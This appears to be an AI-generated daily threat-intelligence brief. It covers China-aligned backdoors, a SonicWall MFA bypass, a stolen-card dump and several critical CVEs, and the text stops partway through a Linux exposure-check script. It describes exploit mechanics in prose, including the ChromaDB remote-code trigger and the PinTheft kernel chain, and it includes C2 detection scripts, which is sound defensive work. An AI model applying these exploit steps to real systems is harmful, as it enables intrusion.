# CTI Daily Brief — 2026-05-21

> **AI-generated content — no human review.** This brief was produced autonomously by an LLM (Claude Opus 4.7, model ID `claude-opus-4-7`) with parallel research and verification by sub-agents (Claude Sonnet 4.6) executing the prompt at `prompts/daily-cti-brief.md` as a Claude Code routine on Anthropic-managed cloud infrastructure. **Nothing here is reviewed or edited by a human before publication.** All facts are linked inline to public sources the agent fetched in this run. Verify any operationally critical claim against the linked primary source before acting.

**Generated by:** Claude Opus 4.7 (`claude-opus-4-7`) · **Sub-agents:** S1: Claude Sonnet 4.6 · S2: Claude Sonnet 4.6 · S3: Claude Sonnet 4.6 · S4: Claude Sonnet 4.6 · verify: Claude Opus 4.7, Claude Sonnet 4.6 · **Classification:** TLP:CLEAR · **Language:** English · **Prompt:** v2.59 · **Recency window:** 36 h (gap to prior brief: 24 h)

## 0. TL;DR

- **Drupal patches "highly critical" pre-auth SQL injection (CVE-2026-9082)** on PostgreSQL-backed installs of Drupal 8.9–11.3; the Security Team warned that "exploits *might* be developed within hours or days" of advisory release. EU/CH government portals and university CMSes are the primary exposed surface ([Drupal Security Team, 2026-05-20](https://www.drupal.org/sa-core-2026-004); [NCSC-CH, 2026-05-19](https://security-hub.ncsc.admin.ch/#/posts/12584)).
- **Webworm (China-aligned) targets Belgian, Italian, Serbian and Polish government organisations** with two new custom backdoors — EchoCreep (Discord C2) and GraphWorm (Microsoft Graph / OneDrive C2). ESET also documents Spanish and Italian governmental documents exfiltrated to a compromised AWS S3 bucket ([ESET Research, 2026-05-20](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/)).
- **TeamPCP breaches GitHub itself** — ~3,800 internal repositories exfiltrated via a poisoned VS Code extension installed on a GitHub employee device; in parallel, the Mini Shai-Hulud worm compromised the official Microsoft `durabletask` PyPI package and propagates across AWS via Systems Manager `SendCommand` and across Kubernetes via `kubectl exec` ([Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/); [Wiz, 2026-05-20](https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack)).
- **Microsoft ships CVE-2026-42822 — CVSS 10.0 unauthenticated network EoP in Azure Local Disconnected Operations (ALDO)** with MSRC exploitability assessment "Exploitation More Likely"; only manually-operated air-gapped Azure Local stacks need action (cloud-managed Azure already protected) ([Microsoft MSRC, 2026-05-18](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822)).
- **Verizon 2026 DBIR (today's deep dive):** vulnerability exploitation overtakes credentials as the leading breach initial-access vector for the first time in the report's 19-year history — 31 % per Verizon's press release ([Verizon, 2026-05-19](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html)) vs 13 % credentials per Help Net Security's reading of the full DBIR ([Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/)); only 26 % of CISA KEV entries fully remediated (down from 38 %); supply-chain breaches +60 % YoY.

## 1. Active Threats, Trending Actors, Notable Incidents & Disclosures

### Webworm (China-aligned) shifts to EU government targets — EchoCreep (Discord C2) and GraphWorm (Microsoft Graph / OneDrive C2) backdoors documented by ESET, with Belgian, Italian, Serbian, Polish and Spanish governmental victims

ESET Research published a technical analysis on 2026-05-20 of Webworm — also tracked as FishMonger / Aquatic Panda / SixLittleMonkeys / Space Pirates — documenting a 2025 campaign pivot to European governmental organisations in Belgium, Italy, Serbia and Poland, plus a South African university; the group has abandoned its prior primary backdoors (Trochilus RAT, McRat / 9002 RAT) in favour of two new custom implants — EchoCreep (which ESET describes as written in Go) and GraphWorm ([ESET WeLiveSecurity, 2026-05-20](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/)). **EchoCreep** uses Discord as a bidirectional C2 channel, encoding commands with base64 + AES-CBC-128; it creates per-victim Discord channels named after the victim IP (or IP+hostname), supports file upload/download and `cmd.exe` command execution, and ESET recovered 433 decrypted Discord messages dating back to 2024-03-21 from four unique victim channels (`T1102.002` Web Service: Bidirectional Communication, `T1059.003` Windows Command Shell). **GraphWorm** is more capable: an implant (implementation language not stated in the ESET write-up) that authenticates against the Microsoft Graph API and uses per-victim OneDrive directories for C2, with `/createUploadSession` for large-file exfiltration and AES-256-CBC + base64 encoding on uploaded data (`T1102.002`, `T1071.001` Application Layer Protocol — Web Protocols); it persists at logon and spawns `cmd.exe` sessions under the implant's process context. 
The custom proxy toolkit added in 2025 includes **WormFrp** (a modified `frp` that pulls its config from a compromised AWS S3 bucket `wamanharipethe.s3.ap-south-1.amazonaws.com`), **ChainWorm** (multi-hop chaining), **SmuxProxy**, and **WormSocket** (`socket.io`-based proxy); a **SharpSecretsdump** Impacket-look-alike credential dumper was uploaded to the same S3 bucket in October 2025 (`T1003.001` OS Credential Dumping: LSASS Memory) ([ESET, 2026-05-20](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/); [The Hacker News, 2026-05-20](https://thehackernews.com/2026/05/webworm-deploys-echocreep-and-graphworm.html)). Files exfiltrated from victims and staged in the S3 bucket included virtual-machine snapshots from an Italian governmental entity and an mRemoteNG connection-configuration file plus a Microsoft Visio infrastructure diagram from a Spanish governmental entity — both documents that materially aid follow-on intrusion. Initial-access tradecraft documented against Serbian targets used CVE-2017-7692 (SquirrelMail post-auth RCE), implying credential theft preceded webmail exploitation. **Why it matters to us:** the cloud-API C2 design (Discord, Microsoft Graph) blends with legitimate enterprise traffic and defeats domain / URL block-lists. Detection concept — alert on Sysmon EID 3 outbound HTTPS to `discord.com/api/*` or `graph.microsoft.com` from process trees whose parent is not the expected first-party application (`Discord.exe`, `Teams.exe`, `OneDrive.exe`, Office); correlate Graph API non-interactive sign-ins in Entra ID for app registrations with no enterprise approval path; flag `cmd.exe` spawned by long-running services with no interactive user context. 
Hardening — Conditional Access for the Microsoft Graph application restricting non-managed device sign-ins; block `socket.io` and Discord WebSocket outbound at the SWG for server workloads that have no business reason; force first-party-only WebSocket egress on government-segment workstations.
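The cloud-API C2 detection concept above, as an added Python example (not ESET's detection content): it joins Sysmon EID 1 and EID 3 records on `ProcessGuid`, flags connections to `discord.com` / `graph.microsoft.com` from non-first-party images, and surfaces `cmd.exe` children of any flagged process. The Office and Teams image names and the sample events are constructed assumptions.

```python
"""Flag Sysmon network events (EID 3) to the cloud APIs the Webworm backdoors use
for C2 when the connecting process is not a first-party client, then surface
cmd.exe children of any flagged process. Added example, not ESET's detection
content; the Office/Teams image names and the sample events are constructed."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Apex hosts named in the brief: EchoCreep -> Discord API, GraphWorm -> Microsoft Graph.
WATCHED_HOSTS = ("discord.com", "graph.microsoft.com")

# First-party images expected to reach each service (assumption; tune to your estate).
OFFICE = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
EXPECTED_IMAGES = {
    "discord.com": {"discord.exe"},
    "graph.microsoft.com": {"teams.exe", "ms-teams.exe", "onedrive.exe"} | OFFICE,
}


@dataclass(frozen=True)
class Alert:
    rule: str          # "cloud-api-c2" or "c2-spawned-shell"
    process_guid: str
    image: str
    parent_image: str
    detail: str


def watched_host(hostname: str) -> str | None:
    """Return the watched apex host when hostname is it or one of its subdomains."""
    host = hostname.lower().rstrip(".")
    for apex in WATCHED_HOSTS:
        if host == apex or host.endswith("." + apex):
            return apex
    return None


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: list[dict]) -> list[Alert]:
    """events: Sysmon records as dicts (EventID 1 = process create, 3 = network connect).
    EID 1 records are joined on ProcessGuid to recover the parent of a connecting process."""
    created = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    alerts: list[Alert] = []
    flagged: set[str] = set()
    # Rule 1: connection to a watched host from an image that is not the expected client.
    for e in events:
        if e["EventID"] != 3:
            continue
        apex = watched_host(e.get("DestinationHostname", ""))
        if apex is None or image_name(e["Image"]) in EXPECTED_IMAGES[apex]:
            continue
        parent = created.get(e["ProcessGuid"], {}).get("ParentImage", "<no EID 1 seen>")
        flagged.add(e["ProcessGuid"])
        alerts.append(Alert("cloud-api-c2", e["ProcessGuid"], e["Image"], parent,
                            f"-> {e['DestinationHostname']}:{e.get('DestinationPort', '?')}"))
    # Rule 2: a command shell spawned by a process flagged under rule 1 (command execution over C2).
    for e in events:
        if (e["EventID"] == 1 and image_name(e["Image"]) == "cmd.exe"
                and e.get("ParentProcessGuid") in flagged):
            alerts.append(Alert("c2-spawned-shell", e["ProcessGuid"], e["Image"],
                                e["ParentImage"], e.get("CommandLine", "")))
    return alerts


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{G1}", "Image": r"C:\Users\u\AppData\Local\Discord\app\Discord.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentProcessGuid": "{G0}"},
    {"EventID": 3, "ProcessGuid": "{G1}", "Image": r"C:\Users\u\AppData\Local\Discord\app\Discord.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},                # expected client
    {"EventID": 1, "ProcessGuid": "{G2}", "Image": r"C:\ProgramData\svc\updater.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "ParentProcessGuid": "{G0}"},
    {"EventID": 3, "ProcessGuid": "{G2}", "Image": r"C:\ProgramData\svc\updater.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},                # rule 1
    {"EventID": 1, "ProcessGuid": "{G3}", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\ProgramData\svc\updater.exe", "ParentProcessGuid": "{G2}",
     "CommandLine": "cmd.exe"},                                                     # rule 2
    {"EventID": 3, "ProcessGuid": "{G4}", "Image": r"C:\Users\u\AppData\Roaming\sync\sync.exe",
     "DestinationHostname": "graph.microsoft.com", "DestinationPort": 443},        # rule 1, no EID 1
    {"EventID": 3, "ProcessGuid": "{G5}", "Image": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "DestinationHostname": "graph.microsoft.com", "DestinationPort": 443},        # expected client
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.image} (parent: {a.parent_image}) {a.detail}")
```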

— *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/) · Additional source: [The Hacker News](https://thehackernews.com/2026/05/webworm-deploys-echocreep-and-graphworm.html) · Tags: nation-state, espionage, identity, cloud, china-nexus · Region: europe · Sector: public-sector, education*

### SonicWall Gen6 SSL-VPN incomplete-patching (CVE-2024-12802) — Akira-linked actors brute-force MFA via UPN/SAM account-name split, February–March 2026 intrusions

Threat actors whose TTPs are consistent with Akira ransomware activity successfully bypassed MFA on SonicWall Gen6 SSL-VPN appliances running officially-patched firmware between February and March 2026; SonicWall and incident-response vendors confirm the root cause is that the firmware update for CVE-2024-12802 (CVSS 9.1, `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N`) does not by itself enforce MFA on both User Principal Name (`user@domain`) and SAM-account-name (`DOMAIN\user`) login formats — six additional manual LDAP-reconfiguration steps from SonicWall KB `kA1VN0000000RBd0AM` are required ([Cybersecurity Dive, 2026-05-20](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/); [BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/security/hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching/)). Attackers brute-forced credentials against the UPN login path — which accepts authentication without triggering MFA challenges when the LDAP reconfiguration is incomplete — at speed and without producing the standard authentication alerts; per BleepingComputer's reporting, intrusion responders observed sessions of 30 to 60 minutes during which attackers logged in, performed network reconnaissance, tested credential reuse on internal systems and logged out. Gen6 SSL-VPN reached end-of-life on 2026-04-16 and receives no further security updates; Gen7 and Gen8 are remediated by firmware update alone. **Why it matters to us:** the technique is a textbook example of why CVSS / vendor-advised patch status is insufficient operational signal — the appliance shows patched-firmware version, MFA appears enabled in the admin UI, and authentications succeed against an alternative account-name format that bypasses the policy enforcement entirely. 
Detection concept — SonicWall Gen6 SSL-VPN syslog filter for successful SSL-VPN authentications where the `login` field is UPN-format rather than SAM-format, especially from source IPs with high authentication-attempt volume; correlate with short-duration recon-and-credential-reuse sessions consistent with the 30-to-60-minute pattern BleepingComputer documents. Hardening — complete every step in SonicWall KB `kA1VN0000000RBd0AM`; given Gen6 EoL, migrate to Gen7/Gen8 on a defined cut-over timeline.
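The UPN-versus-SAM syslog filter above, as an added Python example (not SonicWall's or BleepingComputer's material): it classifies the login format of each successful SSL-VPN authentication and raises the severity when the source IP also shows brute-force volume. The key=value syslog shape and field names (`time=`, `src=`, `login=`, `msg=`) are a constructed approximation, as is the threshold.

```python
"""Hunt for successful SonicWall SSL-VPN logins that used the UPN (user@domain)
account-name format, the path the incomplete CVE-2024-12802 fix left without MFA.
Added example; the key=value syslog shape (time=, src=, login=, msg=) is a
constructed approximation, so map it to your appliance's real field names first."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')
UPN_RE = re.compile(r"^[^@\\\s]+@[^@\\\s]+\.[^@\\\s]+$")   # user@domain.tld
SAM_RE = re.compile(r"^[^@\\\s]+\\[^@\\\s]+$")             # DOMAIN\user
# Attempts from one source IP at or above this count make a UPN success brute-force-consistent
# (threshold is an assumption; tune to the window you review).
BRUTE_FORCE_THRESHOLD = 5


@dataclass(frozen=True)
class Finding:
    time: str
    src: str
    login: str
    attempts_from_src: int
    severity: str  # "high" when the source IP also shows brute-force volume, else "medium"


def parse_kv(line: str) -> dict[str, str]:
    """Split 'k=v k="quoted v"' syslog into a dict."""
    return {key: quoted or bare for key, _, quoted, bare in KV_RE.findall(line)}


def login_format(login: str) -> str:
    if UPN_RE.match(login):
        return "upn"
    if SAM_RE.match(login):
        return "sam"
    return "other"


def is_auth_event(ev: dict[str, str]) -> bool:
    return ev.get("msg", "").startswith("SSL VPN login")   # constructed message convention


def hunt(lines: list[str]) -> list[Finding]:
    auth = [ev for ev in map(parse_kv, lines) if is_auth_event(ev)]
    attempts = Counter(ev.get("src", "") for ev in auth)    # successes and failures alike
    findings: list[Finding] = []
    for ev in auth:
        if ev.get("msg") != "SSL VPN login successful":
            continue
        login = ev.get("login", "")
        if login_format(login) != "upn":
            continue  # SAM-format logins are not the bypass path described in the reporting
        n = attempts[ev.get("src", "")]
        severity = "high" if n >= BRUTE_FORCE_THRESHOLD else "medium"
        findings.append(Finding(ev.get("time", ""), ev.get("src", ""), login, n, severity))
    return findings


# Constructed sample log lines (TEST-NET addresses, fictitious users).
SAMPLE_SYSLOG = [
    'time="2026-03-02 01:10:02" src=198.51.100.23 login="j.doe@corp.example" msg="SSL VPN login failed"',
    'time="2026-03-02 01:10:09" src=198.51.100.23 login="j.doe@corp.example" msg="SSL VPN login failed"',
    'time="2026-03-02 01:10:15" src=198.51.100.23 login="j.doe@corp.example" msg="SSL VPN login failed"',
    'time="2026-03-02 01:10:22" src=198.51.100.23 login="j.doe@corp.example" msg="SSL VPN login failed"',
    'time="2026-03-02 01:11:40" src=198.51.100.23 login="j.doe@corp.example" msg="SSL VPN login successful"',
    'time="2026-03-02 08:00:11" src=203.0.113.5 login="CORP\\a.smith" msg="SSL VPN login successful"',
    'time="2026-03-02 08:05:30" src=192.0.2.10 login="b.lee@corp.example" msg="SSL VPN login successful"',
    'time="2026-03-02 08:40:00" src=192.0.2.10 login="b.lee@corp.example" msg="SSL VPN session ended"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_SYSLOG):
        print(f"[{f.severity}] {f.time} {f.src} {f.login} (attempts from src: {f.attempts_from_src})")
```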

— *Source: [Cybersecurity Dive](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching/) · Tags: ransomware, vulnerabilities, actively-exploited, identity, auth-bypass · Region: europe, global · Sector: public-sector, finance, technology · CVE: CVE-2024-12802 · CVSS: 9.1 · Vector: zero-click · Auth: pre-auth · Status: exploited, patch-available, mitigation-only*

### B1ack's Stash carding marketplace publicly releases 4.6M card records — SOCRadar attributes collection to e-skimming and phishing; not confirmed by issuing banks

The dark-web carding marketplace B1ack's Stash — operational since at least 2023, with prior free-release waves of 1M cards in April 2024 and 4M in February 2025 — announced the free release of approximately 4.6 million stolen credit and debit card records on 2026-05-18 as a punitive action against vendors that cross-listed cards on competing shops ([SOCRadar, 2026-05-18](https://socradar.io/blog/b1acks-stash-4-6-million-stolen-credit-cards-free/); [Security Affairs, 2026-05-20](https://securityaffairs.com/192415/cyber-crime/carding-site-b1acks-stash-dumps-4-6-million-stolen-cards-for-free.html)). Each record carries the full primary account number, expiration date, CVV2, cardholder name, billing address, email, phone number and source IP — sufficient detail for card-not-present (CNP) fraud. SOCRadar's analysis estimates ~4.3 million records are net-new after de-duplication and expired-card filtering; geographic distribution is approximately 70 % US-issued, with Canada, UK, France, Malaysia, Hong Kong, Singapore and Thailand as secondary sources. SOCRadar attributes the collection methodology to e-skimming and phishing based on capture completeness. This is a dark-web marketplace claim — B1ack's Stash listed the dump for free, but no individual issuing bank has confirmed that specific cards originated from their systems. **Defender takeaway:** Swiss and European card-fraud teams should query their compromise feeds (FS-ISAC, card-network compromise files) for matching BIN ranges and review e-skimming exposure on legacy WooCommerce / Magento storefronts in the customer-facing estate; the consistent collection-method finding across multiple B1ack's Stash waves points at front-end JavaScript skimmer infections as the upstream root cause that still goes undetected in many low-volume merchant configurations.

— *Source: [SOCRadar](https://socradar.io/blog/b1acks-stash-4-6-million-stolen-credit-cards-free/) · Additional source: [Security Affairs](https://securityaffairs.com/192415/cyber-crime/carding-site-b1acks-stash-dumps-4-6-million-stolen-cards-for-free.html) · Tags: cryptocrime, data-breach, phishing, organized-crime · Region: us, europe, apac · Sector: finance, retail*

## 2. Trending Vulnerabilities

### CVE-2026-42822 — Microsoft Azure Local Disconnected Operations (ALDO): CVSS 10.0 unauthenticated network elevation-of-privilege, "Exploitation More Likely"

Microsoft assigned CVE-2026-42822 (CVSS 3.1 = 10.0, CWE-287 Improper Authentication, vector `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`) to an authentication-bypass flaw in Azure Local Disconnected Operations (ALDO) — Microsoft's solution for running Azure services in air-gapped or partially-disconnected infrastructure environments — that allows an unauthorised network attacker to elevate privileges over a network with no credentials and no prior foothold ([Microsoft MSRC, 2026-05-18](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822)). MSRC rates "Exploitation More Likely"; no in-the-wild exploitation observed and no public PoC at advisory release. Cloud-managed Azure customers using Microsoft-operated Resource Manager environments are already protected — only manually-operated air-gapped Azure Local stacks need action. Remediation requires upgrading ALDO to version 2604 or later via the standard ALDO update channel. **Defender takeaway:** EU public-sector operators running Azure Local for data-sovereignty / federal data-residency compliance (a common pattern in Bundesverwaltung and German Bundesbehörden environments) should treat this as a Patch-Tuesday-class emergency on disconnected infrastructure where update cadence is typically slower than cloud-managed Azure. Restrict the ALDO management plane to admin-only OOB subnets until v2604 is installed.

— *Source: [Microsoft MSRC](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822) · Tags: vulnerabilities, cloud, auth-bypass, priv-esc · Region: global · CVE: CVE-2026-42822 · CVSS: 10.0 · Vector: zero-click · Auth: pre-auth · Status: patch-available*

### CVE-2026-45829 — ChromaDB Python FastAPI server: pre-auth RCE via embedding-function model loading before auth check (CVSS 4.0 = 10.0; still unpatched in v1.5.9)

HiddenLayer / Hadrian researchers disclosed CVE-2026-45829, a CVSS 4.0 = 10.0 pre-authentication RCE in ChromaDB's Python FastAPI server (affected from v1.0.0) ([Hadrian Security, 2026-05-19](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are); [BleepingComputer, 2026-05-19](https://www.bleepingcomputer.com/news/security/max-severity-flaw-in-chromadb-for-ai-apps-allows-server-hijacking/)). The vulnerable endpoint is `POST /api/v2/tenants/{tenant}/databases/{db}/collections`: when the request body sets `trust_remote_code: true` with an attacker-controlled HuggingFace model identifier (or a local path), the server fetches and executes the attacker-supplied Python code *before* the auth check fires, then politely returns `403 Forbidden` after the code has run. The flaw exists only in the Python FastAPI server (`chromadb[server]` pip package) — the default Rust server (`chroma run`) does not traverse this code path. Per [BleepingComputer's reporting of Shodan queries](https://www.bleepingcomputer.com/news/security/max-severity-flaw-in-chromadb-for-ai-apps-allows-server-hijacking/), approximately 73 % of internet-exposed ChromaDB instances are running a vulnerable version of the software. **As of disclosure, ChromaDB v1.5.9 (latest) is unpatched.** Mitigations: disable the Python FastAPI server and migrate to the Rust server; alternatively, block network-level access to the ChromaDB API (it should never be internet-exposed in the first place); if internal, set `trust_remote_code: false` server-wide via config. Detection concept — unexpected outbound network connections from ChromaDB Python server processes; child processes spawned by `uvicorn` / `gunicorn` workers with non-default lineage; access logs showing `POST /api/v2/.../collections` bodies referencing HuggingFace repository slugs with attacker-controlled patterns. 
ATT&CK mapping — `T1190` Exploit Public-Facing Application for the entry point; the resulting code execution maps to `T1059.006` Command and Scripting Interpreter: Python under the server's process context.

— *Source: [Hadrian Security](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/max-severity-flaw-in-chromadb-for-ai-apps-allows-server-hijacking/) · Tags: vulnerabilities, rce, pre-auth, no-patch, poc-public, ai-abuse · Region: global · Sector: technology, education · CVE: CVE-2026-45829 · CVSS: 10.0 · Vector: zero-click · Auth: pre-auth · Status: poc-public, no-patch*

### Keycloak 26.6.2 — 16 CVEs including OIDC session fixation (CVE-2026-7507), WebAuthn execute-actions token replay (CVE-2026-37982), introspection audience bypass (CVE-2026-37979) and cross-realm IDOR in Authorization Services (CVE-2026-4630)

The Keycloak project shipped 26.6.2 on 2026-05-19, fixing 16 CVEs across identity, authentication and authorisation subsystems; BSI's CERT-Bund issued advisory WID-SEC-2026-1612 on 2026-05-20 classifying the batch as HIGH risk ([Keycloak Project, 2026-05-19](https://www.keycloak.org/2026/05/keycloak-2662-released); [BSI CERT-Bund, 2026-05-20](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1612)). The operationally highest-priority CVEs for public-sector defenders: **CVE-2026-7507** — session fixation in the OIDC login flow where a crafted `state` parameter before user authentication completes enables account takeover (`T1078` Valid Accounts, `T1556` Modify Authentication Process); **CVE-2026-37982** — execute-actions token replay allowing unauthorised WebAuthn / FIDO2 credential enrollment on a victim account after one user interaction (`T1098.005` Account Manipulation: Device Registration); **CVE-2026-37979** — the OIDC token introspection endpoint `/auth/realms/{realm}/protocol/openid-connect/token/introspect` does not enforce audience restrictions, leaking claims from lightweight access tokens scoped to one client when presented to any introspection-enabled endpoint; **CVE-2026-4630** — cross-resource-server IDOR in the Authorization Services Protection API allowing an authenticated attacker with a token from realm A to read or modify resource permissions in realm B on the same Keycloak instance; **CVE-2026-37978** — cross-role PII leakage via the admin `/auth/admin/realms/{realm}/clients/{client}/evaluate-scopes` endpoint bypassing user-view permissions; **CVE-2026-6856** — acceptable-AAGUID policy bypass in WebAuthn packed self-attestation, allowing enrollment of hardware tokens outside the configured policy list. Fix: upgrade to 26.6.2; Red Hat build of Keycloak (RH-SSO / RHBK) 26.2.x is similarly affected via separate RHSA advisories. 
**Defender takeaway:** Keycloak is the de-facto standard IAM for EU public-sector and Swiss cantonal / federal identity federation projects, with multiple member-state digital-identity frameworks and national eHealth platforms built on top. Detection concept — admin audit-log entries showing token-introspection responses for mismatched audiences; cross-realm access attempts surfaced as `RESOURCE_TYPE: authorization_resource` in admin event logs; WebAuthn enrollment events with an AAGUID outside the configured policy list.

— *Source: [Keycloak Project](https://www.keycloak.org/2026/05/keycloak-2662-released) · Additional source: [BSI CERT-Bund WID-SEC-2026-1612](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1612) · Tags: vulnerabilities, identity, auth-bypass, patch-available, eu-nexus · Region: europe, dach · Sector: public-sector, healthcare, education · CVE: CVE-2026-7507, CVE-2026-37982, CVE-2026-37979, CVE-2026-4630, CVE-2026-37978, CVE-2026-6856 · CVSS: not yet assigned (BSI HIGH classification) · Vector: zero-click · Auth: pre-auth · Status: patch-available*

#### CVE Summary Table

| CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source |
|---|---|---|---|---|---|---|---|
| CVE-2026-9082 | Drupal core (PostgreSQL backend) | 20/25 Drupal-scale | not yet scored | No | No (vendor warned of within-hours weaponisation) | 10.4.10 / 10.5.10 / 10.6.9 / 11.1.10 / 11.2.12 / 11.3.10 (2026-05-20) | [Drupal](https://www.drupal.org/sa-core-2026-004) |
| CVE-2026-42822 | Microsoft Azure Local Disconnected Operations (ALDO) | 10.0 | not yet scored | No | No (MSRC: "Exploitation More Likely") | ALDO 2604+ (2026-05-18) | [MSRC](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822) |
| CVE-2026-45829 | ChromaDB Python FastAPI server | 10.0 (CVSS 4.0) | not yet scored | No | No (public PoC by HiddenLayer) | None — v1.5.9 unpatched at disclosure | [Hadrian](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are) |
| CVE-2026-7507 | Keycloak (OIDC login session fixation) | not yet assigned (BSI HIGH) | not yet scored | No | No | 26.6.2 (2026-05-19) | [Keycloak](https://www.keycloak.org/2026/05/keycloak-2662-released) |
| CVE-2024-12802 | SonicWall Gen6 SSL-VPN | 9.1 (CVSS 3.1) | not retrieved | No | Yes — Akira-linked, Feb–Mar 2026 | Firmware update insufficient without 6-step LDAP reconfig; Gen6 EoL 2026-04-16 | [Cybersecurity Dive](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/) |

## 3. Research & Investigative Reporting

### PinTheft — Linux kernel local-privilege-escalation primitive (RDS zerocopy double-free + io_uring fixed-buffer page-cache overwrite), PoC public, Arch Linux default-loaded

Aaron Esau (V12 Security) disclosed PinTheft on 2026-05-19 via the `oss-security` mailing list — a Linux kernel local privilege escalation that chains an RDS (Reliable Datagram Sockets) zerocopy double-free with `io_uring` fixed-buffer reference manipulation to overwrite the page cache of a SUID-root binary and gain root ([oss-security / V12 Security, 2026-05-19](https://www.openwall.com/lists/oss-security/2026/05/19/6); [BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/linux/exploit-released-for-new-pintheft-arch-linux-root-escalation-flaw/)). The bug lives in `rds_message_zcopy_from_user()` in the RDS send path: a partial page fault mid-scatter causes the error path to drop already-pinned pages while leaving the scatterlist bookkeeping live, so cleanup drops the pages a second time. The exploit registers an anonymous memory page as an `io_uring` fixed buffer (`FOLL_PIN` bias of 1024 references), drains all references via 1024 deliberately-failing RDS sends, then reuses the stale `io_uring` page pointer to overwrite the page cache of a SUID-root binary and redirect execution to attacker shellcode. Prerequisites: RDS kernel module loaded, `io_uring` enabled, a readable SUID-root binary, x86_64. **The RDS module is default-loaded only on Arch Linux** — not on Ubuntu, Fedora, Debian, RHEL or SUSE — narrowing the primary defender population to Arch CI/CD runners, developer workstations and AUR-based servers, plus any environment that explicitly `modprobe`'d `rds`. Upstream kernel patch landed before disclosure; **no CVE assigned at disclosure**. Technique class: `T1068` Exploitation for Privilege Escalation. Defender detection — auditd syscall events for `rds_sendmsg` / `io_uring_*` from unexpected binaries; Sysmon Linux EID 1 with process lineage showing a non-root process spawning a root shell without `sudo`/`su`. 
Hardening: `modprobe.d` blacklist `rds` if not in use; `sysctl kernel.io_uring_disabled=2` for untrusted workloads; apply upstream kernel patch when distributed via the distro's normal update channel.
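The prerequisite and hardening points above, as an added Python exposure check (not part of the disclosure): it reads `/proc/modules`, `/etc/modprobe.d`, and `kernel.io_uring_disabled` to report whether RDS is reachable and io_uring usable, with the parsing kept separate from the file reads so it runs offline on constructed inputs. The `install rds /bin/false` idiom is accepted as an equivalent of the `blacklist rds` line the brief recommends.

```python
"""Exposure check for the two PinTheft prerequisites the brief names: RDS reachable
and io_uring usable. Added example, not part of the disclosure; parsing is split
from file reads so it runs offline on constructed inputs."""
from __future__ import annotations

import glob
import re
from dataclasses import dataclass

# "blacklist rds" (what the brief recommends) or the stricter "install rds /bin/false" idiom.
RDS_BLOCK_RE = re.compile(r"^\s*(?:blacklist\s+rds|install\s+rds\s+/bin/(?:false|true))\s*(?:#.*)?$", re.M)


@dataclass(frozen=True)
class Exposure:
    rds_loaded: bool
    rds_blacklisted: bool
    io_uring: str  # "enabled", "restricted" or "disabled"

    @property
    def rds_reachable(self) -> bool:
        # An unloaded module is still reachable if socket(AF_RDS) can autoload it.
        return self.rds_loaded or not self.rds_blacklisted

    @property
    def exposed(self) -> bool:
        # "restricted" (io_uring_disabled=1) still allows CAP_SYS_ADMIN / io_uring_group callers,
        # so only a fully disabled io_uring removes the primitive.
        return self.rds_reachable and self.io_uring != "disabled"


def rds_loaded(proc_modules: str) -> bool:
    """/proc/modules: '<name> <size> <refcount> <users> <state> <address>' per line."""
    return any(line.split()[0] == "rds" for line in proc_modules.splitlines() if line.strip())


def rds_blacklisted(modprobe_confs: list[str]) -> bool:
    return any(RDS_BLOCK_RE.search(conf) for conf in modprobe_confs)


def io_uring_state(sysctl_value: str | None) -> str:
    """kernel.io_uring_disabled (Linux >= 6.6): 0 enabled, 1 restricted to CAP_SYS_ADMIN /
    io_uring_group, 2 disabled. A missing sysctl (older kernel) means no knob, i.e. enabled."""
    if sysctl_value is None:
        return "enabled"
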